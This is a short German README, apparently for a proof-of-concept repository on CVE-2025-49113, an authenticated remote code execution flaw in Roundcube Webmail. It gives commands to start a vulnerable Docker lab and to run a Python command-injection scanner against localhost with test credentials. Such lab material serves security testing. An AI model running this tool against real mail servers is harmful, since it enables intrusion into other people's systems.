
Proof-of-Concept für CVE-2025-49113: Remote-Code-Ausführung nach Authentifizierung in Roundcube Webmail. Enthält eine angreifbare Docker-Umgebung und einen Python-Scanner zum Testen von Befehlsinjektionen.
cd Stand
docker-compose up -d
cd PoC/src
python3 scanner.py --target http://localhost:9000 --username test --password test --command "id"
test / testhttp://localhost:9000